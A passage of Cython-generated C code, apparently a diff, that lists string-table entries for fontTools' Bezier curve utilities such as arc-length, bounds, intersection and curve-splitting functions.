0, 1, 1}, - {&__pyx_n_s_2_t_1_t, __pyx_k_2_t_1_t, sizeof(__pyx_k_2_t_1_t), 0, 0, 1, 1}, - {&__pyx_kp_u_Approximates_the_arc_length_for, __pyx_k_Approximates_the_arc_length_for, sizeof(__pyx_k_Approximates_the_arc_length_for), 0, 1, 0, 0}, - {&__pyx_n_s_AttributeError, __pyx_k_AttributeError, sizeof(__pyx_k_AttributeError), 0, 0, 1, 1}, - {&__pyx_n_s_COMPILED, __pyx_k_COMPILED, sizeof(__pyx_k_COMPILED), 0, 0, 1, 1}, - {&__pyx_kp_u_Calculates_the_arc_length_for_a, __pyx_k_Calculates_the_arc_length_for_a, sizeof(__pyx_k_Calculates_the_arc_length_for_a), 0, 1, 0, 0}, - {&__pyx_kp_u_Calculates_the_bounding_rectangl, __pyx_k_Calculates_the_bounding_rectangl, sizeof(__pyx_k_Calculates_the_bounding_rectangl), 0, 1, 0, 0}, - {&__pyx_kp_u_Calculates_the_bounding_rectangl_2, __pyx_k_Calculates_the_bounding_rectangl_2, sizeof(__pyx_k_Calculates_the_bounding_rectangl_2), 0, 1, 0, 0}, - {&__pyx_kp_u_Couldn_t_work_out_which_intersec, __pyx_k_Couldn_t_work_out_which_intersec, sizeof(__pyx_k_Couldn_t_work_out_which_intersec), 0, 1, 0, 0}, - {&__pyx_n_s_DD, __pyx_k_DD, sizeof(__pyx_k_DD), 0, 0, 1, 1}, - {&__pyx_kp_u_Finds_intersections_between_a_cu, __pyx_k_Finds_intersections_between_a_cu, sizeof(__pyx_k_Finds_intersections_between_a_cu), 0, 1, 0, 0}, - {&__pyx_kp_u_Finds_intersections_between_a_cu_2, __pyx_k_Finds_intersections_between_a_cu_2, sizeof(__pyx_k_Finds_intersections_between_a_cu_2), 0, 1, 0, 0}, - {&__pyx_kp_u_Finds_intersections_between_two, __pyx_k_Finds_intersections_between_two, sizeof(__pyx_k_Finds_intersections_between_two), 0, 1, 0, 0}, - {&__pyx_kp_u_Finds_intersections_between_two_2, __pyx_k_Finds_intersections_between_two_2, sizeof(__pyx_k_Finds_intersections_between_two_2), 0, 1, 0, 0}, - {&__pyx_n_s_Identity, __pyx_k_Identity, sizeof(__pyx_k_Identity), 0, 0, 1, 1}, - {&__pyx_n_s_ImportError, __pyx_k_ImportError, sizeof(__pyx_k_ImportError), 0, 0, 1, 1}, - {&__pyx_n_s_Intersection, __pyx_k_Intersection, sizeof(__pyx_k_Intersection), 0, 0, 1, 1}, - 
{&__pyx_n_u_Intersection, __pyx_k_Intersection, sizeof(__pyx_k_Intersection), 0, 1, 0, 1}, - {&__pyx_n_s_Len, __pyx_k_Len, sizeof(__pyx_k_Len), 0, 0, 1, 1}, - {&__pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_k_Lib_fontTools_misc_bezierTools_p, sizeof(__pyx_k_Lib_fontTools_misc_bezierTools_p), 0, 0, 1, 0}, - {&__pyx_n_s_Q, __pyx_k_Q, sizeof(__pyx_k_Q), 0, 0, 1, 1}, - {&__pyx_n_s_Q3, __pyx_k_Q3, sizeof(__pyx_k_Q3), 0, 0, 1, 1}, - {&__pyx_n_s_R, __pyx_k_R, sizeof(__pyx_k_R), 0, 0, 1, 1}, - {&__pyx_n_s_R2, __pyx_k_R2, sizeof(__pyx_k_R2), 0, 0, 1, 1}, - {&__pyx_n_s_R2_Q3, __pyx_k_R2_Q3, sizeof(__pyx_k_R2_Q3), 0, 0, 1, 1}, - {&__pyx_kp_u_Solve_a_cubic_equation_Solves_a, __pyx_k_Solve_a_cubic_equation_Solves_a, sizeof(__pyx_k_Solve_a_cubic_equation_Solves_a), 0, 1, 0, 0}, - {&__pyx_kp_u_Split_a_cubic_Bezier_curve_at_a, __pyx_k_Split_a_cubic_Bezier_curve_at_a, sizeof(__pyx_k_Split_a_cubic_Bezier_curve_at_a), 0, 1, 0, 0}, - {&__pyx_kp_u_Split_a_cubic_Bezier_curve_at_on, __pyx_k_Split_a_cubic_Bezier_curve_at_on, sizeof(__pyx_k_Split_a_cubic_Bezier_curve_at_on), 0, 1, 0, 0}, - {&__pyx_kp_u_Split_a_line_at_a_given_coordina, __pyx_k_Split_a_line_at_a_given_coordina, sizeof(__pyx_k_Split_a_line_at_a_given_coordina), 0, 1, 0, 0}, - {&__pyx_kp_u_Split_a_quadratic_Bezier_curve_a, __pyx_k_Split_a_quadratic_Bezier_curve_a, sizeof(__pyx_k_Split_a_quadratic_Bezier_curve_a), 0, 1, 0, 0}, - {&__pyx_kp_u_Split_a_quadratic_Bezier_curve_a_2, __pyx_k_Split_a_quadratic_Bezier_curve_a_2, sizeof(__pyx_k_Split_a_quadratic_Bezier_curve_a_2), 0, 1, 0, 0}, - {&__pyx_n_s_TypeError, __pyx_k_TypeError, sizeof(__pyx_k_TypeError), 0, 0, 1, 1}, - {&__pyx_kp_u_Unknown_curve_degree, __pyx_k_Unknown_curve_degree, sizeof(__pyx_k_Unknown_curve_degree), 0, 1, 0, 0}, - {&__pyx_n_s_ValueError, __pyx_k_ValueError, sizeof(__pyx_k_ValueError), 0, 0, 1, 1}, - {&__pyx_kp_u__10, __pyx_k__10, sizeof(__pyx_k__10), 0, 1, 0, 0}, - {&__pyx_n_s__103, __pyx_k__103, sizeof(__pyx_k__103), 0, 0, 1, 1}, - {&__pyx_n_s__11, 
__pyx_k__11, sizeof(__pyx_k__11), 0, 0, 1, 1}, - {&__pyx_kp_u__9, __pyx_k__9, sizeof(__pyx_k__9), 0, 1, 0, 0}, - {&__pyx_n_s__91, __pyx_k__91, sizeof(__pyx_k__91), 0, 0, 1, 1}, - {&__pyx_n_s_a, __pyx_k_a, sizeof(__pyx_k_a), 0, 0, 1, 1}, - {&__pyx_n_s_a1, __pyx_k_a1, sizeof(__pyx_k_a1), 0, 0, 1, 1}, - {&__pyx_n_s_a1_3, __pyx_k_a1_3, sizeof(__pyx_k_a1_3), 0, 0, 1, 1}, - {&__pyx_n_s_a1x, __pyx_k_a1x, sizeof(__pyx_k_a1x), 0, 0, 1, 1}, - {&__pyx_n_s_a1y, __pyx_k_a1y, sizeof(__pyx_k_a1y), 0, 0, 1, 1}, - {&__pyx_n_s_a2, __pyx_k_a2, sizeof(__pyx_k_a2), 0, 0, 1, 1}, - {&__pyx_n_s_a3, __pyx_k_a3, sizeof(__pyx_k_a3), 0, 0, 1, 1}, - {&__pyx_n_s_acos, __pyx_k_acos, sizeof(__pyx_k_acos), 0, 0, 1, 1}, - {&__pyx_n_s_aligned_curve, __pyx_k_aligned_curve, sizeof(__pyx_k_aligned_curve), 0, 0, 1, 1}, - {&__pyx_n_s_alignment_transformation, __pyx_k_alignment_transformation, sizeof(__pyx_k_alignment_transformation), 0, 0, 1, 1}, - {&__pyx_n_s_all, __pyx_k_all, sizeof(__pyx_k_all), 0, 0, 1, 1}, - {&__pyx_n_s_angle, __pyx_k_angle, sizeof(__pyx_k_angle), 0, 0, 1, 1}, - {&__pyx_n_s_append, __pyx_k_append, sizeof(__pyx_k_append), 0, 0, 1, 1}, - {&__pyx_n_s_approximateCubicArcLength, __pyx_k_approximateCubicArcLength, sizeof(__pyx_k_approximateCubicArcLength), 0, 0, 1, 1}, - {&__pyx_n_u_approximateCubicArcLength, __pyx_k_approximateCubicArcLength, sizeof(__pyx_k_approximateCubicArcLength), 0, 1, 0, 1}, - {&__pyx_n_s_approximateCubicArcLengthC, __pyx_k_approximateCubicArcLengthC, sizeof(__pyx_k_approximateCubicArcLengthC), 0, 0, 1, 1}, - {&__pyx_n_u_approximateCubicArcLengthC, __pyx_k_approximateCubicArcLengthC, sizeof(__pyx_k_approximateCubicArcLengthC), 0, 1, 0, 1}, - {&__pyx_kp_u_approximateCubicArcLength_line_3, __pyx_k_approximateCubicArcLength_line_3, sizeof(__pyx_k_approximateCubicArcLength_line_3), 0, 1, 0, 0}, - {&__pyx_n_s_approximateQuadraticArcLength, __pyx_k_approximateQuadraticArcLength, sizeof(__pyx_k_approximateQuadraticArcLength), 0, 0, 1, 1}, - 
{&__pyx_n_u_approximateQuadraticArcLength, __pyx_k_approximateQuadraticArcLength, sizeof(__pyx_k_approximateQuadraticArcLength), 0, 1, 0, 1}, - {&__pyx_n_s_approximateQuadraticArcLengthC, __pyx_k_approximateQuadraticArcLengthC, sizeof(__pyx_k_approximateQuadraticArcLengthC), 0, 0, 1, 1}, - {&__pyx_n_u_approximateQuadraticArcLengthC, __pyx_k_approximateQuadraticArcLengthC, sizeof(__pyx_k_approximateQuadraticArcLengthC), 0, 1, 0, 1}, - {&__pyx_n_s_arch, __pyx_k_arch, sizeof(__pyx_k_arch), 0, 0, 1, 1}, - {&__pyx_n_s_args, __pyx_k_args, sizeof(__pyx_k_args), 0, 0, 1, 1}, - {&__pyx_n_s_asinh, __pyx_k_asinh, sizeof(__pyx_k_asinh), 0, 0, 1, 1}, - {&__pyx_n_s_asyncio_coroutines, __pyx_k_asyncio_coroutines, sizeof(__pyx_k_asyncio_coroutines), 0, 0, 1, 1}, - {&__pyx_n_s_atan2, __pyx_k_atan2, sizeof(__pyx_k_atan2), 0, 0, 1, 1}, - {&__pyx_n_s_ax, __pyx_k_ax, sizeof(__pyx_k_ax), 0, 0, 1, 1}, - {&__pyx_n_s_ax2, __pyx_k_ax2, sizeof(__pyx_k_ax2), 0, 0, 1, 1}, - {&__pyx_n_s_ax3, __pyx_k_ax3, sizeof(__pyx_k_ax3), 0, 0, 1, 1}, - {&__pyx_n_s_ay, __pyx_k_ay, sizeof(__pyx_k_ay), 0, 0, 1, 1}, - {&__pyx_n_s_ay2, __pyx_k_ay2, sizeof(__pyx_k_ay2), 0, 0, 1, 1}, - {&__pyx_n_s_ay3, __pyx_k_ay3, sizeof(__pyx_k_ay3), 0, 0, 1, 1}, - {&__pyx_n_s_b, __pyx_k_b, sizeof(__pyx_k_b), 0, 0, 1, 1}, - {&__pyx_n_s_b1, __pyx_k_b1, sizeof(__pyx_k_b1), 0, 0, 1, 1}, - {&__pyx_n_s_b1x, __pyx_k_b1x, sizeof(__pyx_k_b1x), 0, 0, 1, 1}, - {&__pyx_n_s_b1y, __pyx_k_b1y, sizeof(__pyx_k_b1y), 0, 0, 1, 1}, - {&__pyx_n_s_both_points_are_on_same_side_of, __pyx_k_both_points_are_on_same_side_of, sizeof(__pyx_k_both_points_are_on_same_side_of), 0, 0, 1, 1}, - {&__pyx_n_s_bounds1, __pyx_k_bounds1, sizeof(__pyx_k_bounds1), 0, 0, 1, 1}, - {&__pyx_n_s_bounds2, __pyx_k_bounds2, sizeof(__pyx_k_bounds2), 0, 0, 1, 1}, - {&__pyx_n_s_box, __pyx_k_box, sizeof(__pyx_k_box), 0, 0, 1, 1}, - {&__pyx_n_s_bx, __pyx_k_bx, sizeof(__pyx_k_bx), 0, 0, 1, 1}, - {&__pyx_n_s_bx2, __pyx_k_bx2, sizeof(__pyx_k_bx2), 0, 0, 1, 1}, - {&__pyx_n_s_by, 
__pyx_k_by, sizeof(__pyx_k_by), 0, 0, 1, 1}, - {&__pyx_n_s_by2, __pyx_k_by2, sizeof(__pyx_k_by2), 0, 0, 1, 1}, - {&__pyx_n_s_c, __pyx_k_c, sizeof(__pyx_k_c), 0, 0, 1, 1}, - {&__pyx_n_s_c1, __pyx_k_c1, sizeof(__pyx_k_c1), 0, 0, 1, 1}, - {&__pyx_n_s_c11, __pyx_k_c11, sizeof(__pyx_k_c11), 0, 0, 1, 1}, - {&__pyx_n_s_c11_range, __pyx_k_c11_range, sizeof(__pyx_k_c11_range), 0, 0, 1, 1}, - {&__pyx_n_s_c12, __pyx_k_c12, sizeof(__pyx_k_c12), 0, 0, 1, 1}, - {&__pyx_n_s_c12_range, __pyx_k_c12_range, sizeof(__pyx_k_c12_range), 0, 0, 1, 1}, - {&__pyx_n_s_c1x, __pyx_k_c1x, sizeof(__pyx_k_c1x), 0, 0, 1, 1}, - {&__pyx_n_s_c1y, __pyx_k_c1y, sizeof(__pyx_k_c1y), 0, 0, 1, 1}, - {&__pyx_n_s_c21, __pyx_k_c21, sizeof(__pyx_k_c21), 0, 0, 1, 1}, - {&__pyx_n_s_c21_range, __pyx_k_c21_range, sizeof(__pyx_k_c21_range), 0, 0, 1, 1}, - {&__pyx_n_s_c22, __pyx_k_c22, sizeof(__pyx_k_c22), 0, 0, 1, 1}, - {&__pyx_n_s_c22_range, __pyx_k_c22_range, sizeof(__pyx_k_c22_range), 0, 0, 1, 1}, - {&__pyx_n_s_calcBounds, __pyx_k_calcBounds, sizeof(__pyx_k_calcBounds), 0, 0, 1, 1}, - {&__pyx_n_s_calcCubicArcLength, __pyx_k_calcCubicArcLength, sizeof(__pyx_k_calcCubicArcLength), 0, 0, 1, 1}, - {&__pyx_n_u_calcCubicArcLength, __pyx_k_calcCubicArcLength, sizeof(__pyx_k_calcCubicArcLength), 0, 1, 0, 1}, - {&__pyx_n_s_calcCubicArcLengthC, __pyx_k_calcCubicArcLengthC, sizeof(__pyx_k_calcCubicArcLengthC), 0, 0, 1, 1}, - {&__pyx_n_u_calcCubicArcLengthC, __pyx_k_calcCubicArcLengthC, sizeof(__pyx_k_calcCubicArcLengthC), 0, 1, 0, 1}, - {&__pyx_n_s_calcCubicArcLengthCRecurse, __pyx_k_calcCubicArcLengthCRecurse, sizeof(__pyx_k_calcCubicArcLengthCRecurse), 0, 0, 1, 1}, - {&__pyx_n_s_calcCubicBounds, __pyx_k_calcCubicBounds, sizeof(__pyx_k_calcCubicBounds), 0, 0, 1, 1}, - {&__pyx_n_u_calcCubicBounds, __pyx_k_calcCubicBounds, sizeof(__pyx_k_calcCubicBounds), 0, 1, 0, 1}, - {&__pyx_kp_u_calcCubicBounds_line_412, __pyx_k_calcCubicBounds_line_412, sizeof(__pyx_k_calcCubicBounds_line_412), 0, 1, 0, 0}, - 
{&__pyx_n_s_calcCubicParameters, __pyx_k_calcCubicParameters, sizeof(__pyx_k_calcCubicParameters), 0, 0, 1, 1}, - {&__pyx_n_s_calcCubicPoints, __pyx_k_calcCubicPoints, sizeof(__pyx_k_calcCubicPoints), 0, 0, 1, 1}, - {&__pyx_n_s_calcQuadraticArcLength, __pyx_k_calcQuadraticArcLength, sizeof(__pyx_k_calcQuadraticArcLength), 0, 0, 1, 1}, - {&__pyx_n_u_calcQuadraticArcLength, __pyx_k_calcQuadraticArcLength, sizeof(__pyx_k_calcQuadraticArcLength), 0, 1, 0, 1}, - {&__pyx_n_s_calcQuadraticArcLengthC, __pyx_k_calcQuadraticArcLengthC, sizeof(__pyx_k_calcQuadraticArcLengthC), 0, 0, 1, 1}, - {&__pyx_n_u_calcQuadraticArcLengthC, __pyx_k_calcQuadraticArcLengthC, sizeof(__pyx_k_calcQuadraticArcLengthC), 0, 1, 0, 1}, - {&__pyx_kp_u_calcQuadraticArcLength_line_151, __pyx_k_calcQuadraticArcLength_line_151, sizeof(__pyx_k_calcQuadraticArcLength_line_151), 0, 1, 0, 0}, - {&__pyx_n_s_calcQuadraticBounds, __pyx_k_calcQuadraticBounds, sizeof(__pyx_k_calcQuadraticBounds), 0, 0, 1, 1}, - {&__pyx_n_u_calcQuadraticBounds, __pyx_k_calcQuadraticBounds, sizeof(__pyx_k_calcQuadraticBounds), 0, 1, 0, 1}, - {&__pyx_kp_u_calcQuadraticBounds_line_298, __pyx_k_calcQuadraticBounds_line_298, sizeof(__pyx_k_calcQuadraticBounds_line_298), 0, 1, 0, 0}, - {&__pyx_n_s_calcQuadraticParameters, __pyx_k_calcQuadraticParameters, sizeof(__pyx_k_calcQuadraticParameters), 0, 0, 1, 1}, - {&__pyx_n_s_calcQuadraticPoints, __pyx_k_calcQuadraticPoints, sizeof(__pyx_k_calcQuadraticPoints), 0, 0, 1, 1}, - {&__pyx_n_s_class_getitem, __pyx_k_class_getitem, sizeof(__pyx_k_class_getitem), 0, 0, 1, 1}, - {&__pyx_n_s_cline_in_traceback, __pyx_k_cline_in_traceback, sizeof(__pyx_k_cline_in_traceback), 0, 0, 1, 1}, - {&__pyx_n_s_close, __pyx_k_close, sizeof(__pyx_k_close), 0, 0, 1, 1}, - {&__pyx_n_s_collections, __pyx_k_collections, sizeof(__pyx_k_collections), 0, 0, 1, 1}, - {&__pyx_n_s_cos, __pyx_k_cos, sizeof(__pyx_k_cos), 0, 0, 1, 1}, - {&__pyx_n_s_cubicPointAtT, __pyx_k_cubicPointAtT, sizeof(__pyx_k_cubicPointAtT), 0, 0, 1, 
1}, - {&__pyx_n_u_cubicPointAtT, __pyx_k_cubicPointAtT, sizeof(__pyx_k_cubicPointAtT), 0, 1, 0, 1}, - {&__pyx_n_s_cubicPointAtTC, __pyx_k_cubicPointAtTC, sizeof(__pyx_k_cubicPointAtTC), 0, 0, 1, 1}, - {&__pyx_n_u_cubicPointAtTC, __pyx_k_cubicPointAtTC, sizeof(__pyx_k_cubicPointAtTC), 0, 1, 0, 1}, - {&__pyx_n_s_curve, __pyx_k_curve, sizeof(__pyx_k_curve), 0, 0, 1, 1}, - {&__pyx_n_s_curve1, __pyx_k_curve1, sizeof(__pyx_k_curve1), 0, 0, 1, 1}, - {&__pyx_n_s_curve2, __pyx_k_curve2, sizeof(__pyx_k_curve2), 0, 0, 1, 1}, - {&__pyx_n_s_curveCurveIntersections, __pyx_k_curveCurveIntersections, sizeof(__pyx_k_curveCurveIntersections), 0, 0, 1, 1}, - {&__pyx_n_u_curveCurveIntersections, __pyx_k_curveCurveIntersections, sizeof(__pyx_k_curveCurveIntersections), 0, 1, 0, 1}, - {&__pyx_kp_u_curveCurveIntersections_line_137, __pyx_k_curveCurveIntersections_line_137, sizeof(__pyx_k_curveCurveIntersections_line_137), 0, 1, 0, 0}, - {&__pyx_n_s_curveLineIntersections, __pyx_k_curveLineIntersections, sizeof(__pyx_k_curveLineIntersections), 0, 0, 1, 1}, - {&__pyx_n_u_curveLineIntersections, __pyx_k_curveLineIntersections, sizeof(__pyx_k_curveLineIntersections), 0, 1, 0, 1}, - {&__pyx_kp_u_curveLineIntersections_line_1248, __pyx_k_curveLineIntersections_line_1248, sizeof(__pyx_k_curveLineIntersections_line_1248), 0, 1, 0, 0}, - {&__pyx_n_s_curve_bounds, __pyx_k_curve_bounds, sizeof(__pyx_k_curve_bounds), 0, 0, 1, 1}, - {&__pyx_n_s_curve_curve_intersections_t, __pyx_k_curve_curve_intersections_t, sizeof(__pyx_k_curve_curve_intersections_t), 0, 0, 1, 1}, - {&__pyx_n_s_curve_curve_intersections_t_loc, __pyx_k_curve_curve_intersections_t_loc, sizeof(__pyx_k_curve_curve_intersections_t_loc), 0, 0, 1, 1}, - {&__pyx_n_s_curve_curve_intersections_t_loc_2, __pyx_k_curve_curve_intersections_t_loc_2, sizeof(__pyx_k_curve_curve_intersections_t_loc_2), 0, 0, 1, 1}, - {&__pyx_n_s_curve_line_intersections_t, __pyx_k_curve_line_intersections_t, sizeof(__pyx_k_curve_line_intersections_t), 0, 0, 1, 1}, - 
{&__pyx_n_s_curve_line_intersections_t_loca, __pyx_k_curve_line_intersections_t_loca, sizeof(__pyx_k_curve_line_intersections_t_loca), 0, 0, 1, 1}, - {&__pyx_n_s_cx, __pyx_k_cx, sizeof(__pyx_k_cx), 0, 0, 1, 1}, - {&__pyx_n_s_cy, __pyx_k_cy, sizeof(__pyx_k_cy), 0, 0, 1, 1}, - {&__pyx_n_s_cython, __pyx_k_cython, sizeof(__pyx_k_cython), 0, 0, 1, 1}, - {&__pyx_n_s_d, __pyx_k_d, sizeof(__pyx_k_d), 0, 0, 1, 1}, - {&__pyx_n_s_d0, __pyx_k_d0, sizeof(__pyx_k_d0), 0, 0, 1, 1}, - {&__pyx_n_s_d1, __pyx_k_d1, sizeof(__pyx_k_d1), 0, 0, 1, 1}, - {&__pyx_n_s_d1x, __pyx_k_d1x, sizeof(__pyx_k_d1x), 0, 0, 1, 1}, - {&__pyx_n_s_d1y, __pyx_k_d1y, sizeof(__pyx_k_d1y), 0, 0, 1, 1}, - {&__pyx_n_s_delta, __pyx_k_delta, sizeof(__pyx_k_delta), 0, 0, 1, 1}, - {&__pyx_n_s_delta_2, __pyx_k_delta_2, sizeof(__pyx_k_delta_2), 0, 0, 1, 1}, - {&__pyx_n_s_delta_3, __pyx_k_delta_3, sizeof(__pyx_k_delta_3), 0, 0, 1, 1}, - {&__pyx_n_s_deriv3, __pyx_k_deriv3, sizeof(__pyx_k_deriv3), 0, 0, 1, 1}, - {&__pyx_kp_u_disable, __pyx_k_disable, sizeof(__pyx_k_disable), 0, 1, 0, 0}, - {&__pyx_n_s_doctest, __pyx_k_doctest, sizeof(__pyx_k_doctest), 0, 0, 1, 1}, - {&__pyx_n_s_dx, __pyx_k_dx, sizeof(__pyx_k_dx), 0, 0, 1, 1}, - {&__pyx_n_s_dy, __pyx_k_dy, sizeof(__pyx_k_dy), 0, 0, 1, 1}, - {&__pyx_n_s_e, __pyx_k_e, sizeof(__pyx_k_e), 0, 0, 1, 1}, - {&__pyx_n_s_e1, __pyx_k_e1, sizeof(__pyx_k_e1), 0, 0, 1, 1}, - {&__pyx_n_s_e1x, __pyx_k_e1x, sizeof(__pyx_k_e1x), 0, 0, 1, 1}, - {&__pyx_n_s_e1y, __pyx_k_e1y, sizeof(__pyx_k_e1y), 0, 0, 1, 1}, - {&__pyx_n_s_e2, __pyx_k_e2, sizeof(__pyx_k_e2), 0, 0, 1, 1}, - {&__pyx_n_s_e2x, __pyx_k_e2x, sizeof(__pyx_k_e2x), 0, 0, 1, 1}, - {&__pyx_n_s_e2y, __pyx_k_e2y, sizeof(__pyx_k_e2y), 0, 0, 1, 1}, - {&__pyx_kp_u_enable, __pyx_k_enable, sizeof(__pyx_k_enable), 0, 1, 0, 0}, - {&__pyx_n_s_end, __pyx_k_end, sizeof(__pyx_k_end), 0, 0, 1, 1}, - {&__pyx_n_s_epsilon, __pyx_k_epsilon, sizeof(__pyx_k_epsilon), 0, 0, 1, 1}, - {&__pyx_n_s_epsilonDigits, __pyx_k_epsilonDigits, 
sizeof(__pyx_k_epsilonDigits), 0, 0, 1, 1}, - {&__pyx_n_s_ex, __pyx_k_ex, sizeof(__pyx_k_ex), 0, 0, 1, 1}, - {&__pyx_n_s_exit, __pyx_k_exit, sizeof(__pyx_k_exit), 0, 0, 1, 1}, - {&__pyx_n_s_ey, __pyx_k_ey, sizeof(__pyx_k_ey), 0, 0, 1, 1}, - {&__pyx_n_s_failed, __pyx_k_failed, sizeof(__pyx_k_failed), 0, 0, 1, 1}, - {&__pyx_n_s_fontTools_misc, __pyx_k_fontTools_misc, sizeof(__pyx_k_fontTools_misc), 0, 0, 1, 1}, - {&__pyx_n_s_fontTools_misc_arrayTools, __pyx_k_fontTools_misc_arrayTools, sizeof(__pyx_k_fontTools_misc_arrayTools), 0, 0, 1, 1}, - {&__pyx_n_s_fontTools_misc_bezierTools, __pyx_k_fontTools_misc_bezierTools, sizeof(__pyx_k_fontTools_misc_bezierTools), 0, 0, 1, 1}, - {&__pyx_n_s_fontTools_misc_transform, __pyx_k_fontTools_misc_transform, sizeof(__pyx_k_fontTools_misc_transform), 0, 0, 1, 1}, - {&__pyx_n_s_found, __pyx_k_found, sizeof(__pyx_k_found), 0, 0, 1, 1}, - {&__pyx_kp_u_g, __pyx_k_g, sizeof(__pyx_k_g), 0, 1, 0, 0}, - {&__pyx_kp_u_gc, __pyx_k_gc, sizeof(__pyx_k_gc), 0, 1, 0, 0}, - {&__pyx_n_s_genexpr, __pyx_k_genexpr, sizeof(__pyx_k_genexpr), 0, 0, 1, 1}, - {&__pyx_n_s_i, __pyx_k_i, sizeof(__pyx_k_i), 0, 0, 1, 1}, - {&__pyx_n_s_import, __pyx_k_import, sizeof(__pyx_k_import), 0, 0, 1, 1}, - {&__pyx_n_s_initializing, __pyx_k_initializing, sizeof(__pyx_k_initializing), 0, 0, 1, 1}, - {&__pyx_n_s_insert, __pyx_k_insert, sizeof(__pyx_k_insert), 0, 0, 1, 1}, - {&__pyx_n_s_intersection_ts, __pyx_k_intersection_ts, sizeof(__pyx_k_intersection_ts), 0, 0, 1, 1}, - {&__pyx_n_s_intersections, __pyx_k_intersections, sizeof(__pyx_k_intersections), 0, 0, 1, 1}, - {&__pyx_n_s_intersects, __pyx_k_intersects, sizeof(__pyx_k_intersects), 0, 0, 1, 1}, - {&__pyx_n_s_isHorizontal, __pyx_k_isHorizontal, sizeof(__pyx_k_isHorizontal), 0, 0, 1, 1}, - {&__pyx_n_s_is_coroutine, __pyx_k_is_coroutine, sizeof(__pyx_k_is_coroutine), 0, 0, 1, 1}, - {&__pyx_n_s_isclose, __pyx_k_isclose, sizeof(__pyx_k_isclose), 0, 0, 1, 1}, - {&__pyx_kp_u_isenabled, __pyx_k_isenabled, 
sizeof(__pyx_k_isenabled), 0, 1, 0, 0}, - {&__pyx_n_s_it, __pyx_k_it, sizeof(__pyx_k_it), 0, 0, 1, 1}, - {&__pyx_n_s_key, __pyx_k_key, sizeof(__pyx_k_key), 0, 0, 1, 1}, - {&__pyx_n_s_line, __pyx_k_line, sizeof(__pyx_k_line), 0, 0, 1, 1}, - {&__pyx_n_s_lineLineIntersections, __pyx_k_lineLineIntersections, sizeof(__pyx_k_lineLineIntersections), 0, 0, 1, 1}, - {&__pyx_n_u_lineLineIntersections, __pyx_k_lineLineIntersections, sizeof(__pyx_k_lineLineIntersections), 0, 1, 0, 1}, - {&__pyx_kp_u_lineLineIntersections_line_1147, __pyx_k_lineLineIntersections_line_1147, sizeof(__pyx_k_lineLineIntersections_line_1147), 0, 1, 0, 0}, - {&__pyx_n_s_linePointAtT, __pyx_k_linePointAtT, sizeof(__pyx_k_linePointAtT), 0, 0, 1, 1}, - {&__pyx_n_u_linePointAtT, __pyx_k_linePointAtT, sizeof(__pyx_k_linePointAtT), 0, 1, 0, 1}, - {&__pyx_n_s_line_t, __pyx_k_line_t, sizeof(__pyx_k_line_t), 0, 0, 1, 1}, - {&__pyx_n_s_line_t_of_pt, __pyx_k_line_t_of_pt, sizeof(__pyx_k_line_t_of_pt), 0, 0, 1, 1}, - {&__pyx_n_s_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 0, 1, 1}, - {&__pyx_n_u_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 1, 0, 1}, - {&__pyx_n_s_math, __pyx_k_math, sizeof(__pyx_k_math), 0, 0, 1, 1}, - {&__pyx_n_s_mid, __pyx_k_mid, sizeof(__pyx_k_mid), 0, 0, 1, 1}, - {&__pyx_n_s_midPt, __pyx_k_midPt, sizeof(__pyx_k_midPt), 0, 0, 1, 1}, - {&__pyx_n_s_midpoint, __pyx_k_midpoint, sizeof(__pyx_k_midpoint), 0, 0, 1, 1}, - {&__pyx_n_s_mult, __pyx_k_mult, sizeof(__pyx_k_mult), 0, 0, 1, 1}, - {&__pyx_n_s_n, __pyx_k_n, sizeof(__pyx_k_n), 0, 0, 1, 1}, - {&__pyx_n_s_name, __pyx_k_name, sizeof(__pyx_k_name), 0, 0, 1, 1}, - {&__pyx_n_s_namedtuple, __pyx_k_namedtuple, sizeof(__pyx_k_namedtuple), 0, 0, 1, 1}, - {&__pyx_n_s_obj, __pyx_k_obj, sizeof(__pyx_k_obj), 0, 0, 1, 1}, - {&__pyx_n_s_off1, __pyx_k_off1, sizeof(__pyx_k_off1), 0, 0, 1, 1}, - {&__pyx_n_s_off2, __pyx_k_off2, sizeof(__pyx_k_off2), 0, 0, 1, 1}, - {&__pyx_n_s_one, __pyx_k_one, sizeof(__pyx_k_one), 0, 0, 1, 1}, - {&__pyx_n_s_origDist, 
__pyx_k_origDist, sizeof(__pyx_k_origDist), 0, 0, 1, 1}, - {&__pyx_n_s_origin, __pyx_k_origin, sizeof(__pyx_k_origin), 0, 0, 1, 1}, - {&__pyx_n_s_p0, __pyx_k_p0, sizeof(__pyx_k_p0), 0, 0, 1, 1}, - {&__pyx_n_s_p1, __pyx_k_p1, sizeof(__pyx_k_p1), 0, 0, 1, 1}, - {&__pyx_n_s_p2, __pyx_k_p2, sizeof(__pyx_k_p2), 0, 0, 1, 1}, - {&__pyx_n_s_p3, __pyx_k_p3, sizeof(__pyx_k_p3), 0, 0, 1, 1}, - {&__pyx_n_s_pi, __pyx_k_pi, sizeof(__pyx_k_pi), 0, 0, 1, 1}, - {&__pyx_n_s_pointAtT, __pyx_k_pointAtT, sizeof(__pyx_k_pointAtT), 0, 0, 1, 1}, - {&__pyx_n_s_pointFinder, __pyx_k_pointFinder, sizeof(__pyx_k_pointFinder), 0, 0, 1, 1}, - {&__pyx_n_s_points, __pyx_k_points, sizeof(__pyx_k_points), 0, 0, 1, 1}, - {&__pyx_n_s_precision, __pyx_k_precision, sizeof(__pyx_k_precision), 0, 0, 1, 1}, - {&__pyx_n_s_print, __pyx_k_print, sizeof(__pyx_k_print), 0, 0, 1, 1}, - {&__pyx_n_s_printSegments, __pyx_k_printSegments, sizeof(__pyx_k_printSegments), 0, 0, 1, 1}, - {&__pyx_n_s_pt, __pyx_k_pt, sizeof(__pyx_k_pt), 0, 0, 1, 1}, - {&__pyx_n_u_pt, __pyx_k_pt, sizeof(__pyx_k_pt), 0, 1, 0, 1}, - {&__pyx_n_s_pt1, __pyx_k_pt1, sizeof(__pyx_k_pt1), 0, 0, 1, 1}, - {&__pyx_n_s_pt1x, __pyx_k_pt1x, sizeof(__pyx_k_pt1x), 0, 0, 1, 1}, - {&__pyx_n_s_pt1y, __pyx_k_pt1y, sizeof(__pyx_k_pt1y), 0, 0, 1, 1}, - {&__pyx_n_s_pt2, __pyx_k_pt2, sizeof(__pyx_k_pt2), 0, 0, 1, 1}, - {&__pyx_n_s_pt2x, __pyx_k_pt2x, sizeof(__pyx_k_pt2x), 0, 0, 1, 1}, - {&__pyx_n_s_pt2y, 